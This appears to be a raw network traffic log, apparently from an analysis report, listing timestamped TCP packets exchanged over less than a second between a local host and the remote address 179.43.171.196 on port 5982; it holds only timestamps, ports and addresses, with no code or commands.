                                                                                                                                                              Nov 21, 2024 11:27:05.675909042 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.676067114 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.676110029 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.677819014 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.677956104 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.677998066 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.679657936 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.685039997 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.685082912 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.685200930 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.685847998 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.685892105 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.685978889 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.687633038 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.687683105 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.687777996 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.689409971 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.689455986 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.689543962 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.690351963 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.690366030 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.690402985 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.694011927 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.694067955 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.694161892 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.694982052 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.695115089 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.695159912 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.696619034 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.696661949 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.696737051 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.698262930 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.698312044 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.698563099 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.700123072 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.700176001 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.700404882 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.702028036 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.702075958 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.702176094 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.703789949 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.703804970 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.703844070 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.705611944 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.705625057 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.705668926 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.707341909 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.707381010 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.707528114 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.709228992 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.709275007 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.709410906 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.710931063 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.710979939 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.711081028 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.712794065 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.712841988 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.712974072 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.714534998 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.714591026 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.714667082 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.716387987 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.716438055 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.716538906 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.718115091 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.718161106 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.718261003 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.719897032 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.719908953 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.719945908 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.721664906 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.721705914 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.721847057 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.723391056 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.723445892 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.723541975 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.725294113 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.725353003 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.725425959 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.727020979 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.727035046 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.727067947 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.727834940 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.727875948 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.727893114 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.731597900 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.731646061 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.731724024 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.732489109 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.732501984 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.732541084 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.734262943 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.734276056 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.734313011 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.736088991 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.736131907 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.736289024 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.737875938 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.737926006 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.738029957 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.739801884 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.739814997 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.739857912 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.741425991 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.741439104 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.741470098 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.743233919 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.743278980 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.743383884 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.744966984 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.745112896 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.745135069 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.746866941 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.746881962 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.746927023 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.748658895 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.748795033 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.748802900 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.750415087 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.750427961 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.750462055 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.752088070 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.752242088 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.752286911 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.754015923 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.754076958 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.862401009 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.862505913 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.862562895 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.863192081 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.863502979 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.863554001 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.863590002 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.865195990 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.865261078 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.865283966 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.866487980 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.866535902 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.866626978 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.868212938 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.868259907 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.868282080 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.870107889 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.870172977 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.870306015 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.871419907 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.871475935 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.871534109 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.873023033 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.873068094 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.873122931 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.876247883 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.876276970 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.876288891 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.876319885 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.876358032 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.877737999 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.877844095 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.877892971 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.879189014 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.879324913 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.879370928 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.880001068 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.880155087 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.880204916 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.881539106 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.881680012 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.881762981 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.883073092 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.883179903 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.884505987 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.884639978 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.884749889 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.884836912 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.886136055 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.886248112 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.886336088 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.887641907 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.887764931 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.887810946 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.889185905 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.889305115 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.889348030 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.890729904 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.890841961 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.890885115 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.892263889 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.892445087 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.892848015 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.893764973 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.893965006 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.894156933 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.895303965 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.895410061 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.895453930 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.896850109 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.896945000 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.897053957 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.898381948 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.898478031 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.899921894 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.899979115 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.899997950 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.900043011 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.901417017 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.901544094 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.901598930 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.902951956 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.903022051 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.903062105 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.904478073 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.904548883 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.904596090 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.906012058 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.906122923 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.906164885 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.907555103 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.907594919 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.907640934 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.909111977 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.909178972 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.909230947 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.910628080 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.910725117 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.910768986 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.912136078 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.912200928 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.912252903 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.913675070 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.913784981 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.913829088 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.915204048 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.915304899 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.915355921 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.916733027 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.916810036 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.916857958 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.918314934 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.918436050 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.918493986 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.919831991 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.919946909 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.919997931 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.921305895 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.921428919 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.921475887 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.922858953 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.923032999 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.923089027 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.924446106 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.924484968 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.924568892 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.925916910 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.926023006 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.926073074 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.927439928 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.927537918 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.927603006 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.929016113 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.929116964 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.929169893 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.930566072 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.930598021 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.930644035 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.932019949 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.932152033 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.932200909 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.933568954 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.933670044 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.933717012 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.935096025 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.935184002 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.935236931 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.936649084 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.936768055 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.936850071 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.938148975 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.938270092 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.938345909 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.939699888 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.939752102 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.939800978 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.941272020 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.941385031 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.941484928 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.942761898 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.942819118 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.942872047 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.182013035 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.182034969 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.182091951 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.229286909 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.229305029 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.229317904 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.229382038 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.282218933 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.301506042 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.301521063 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.301534891 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.301573038 CET497185982192.168.2.9179.43.171.196
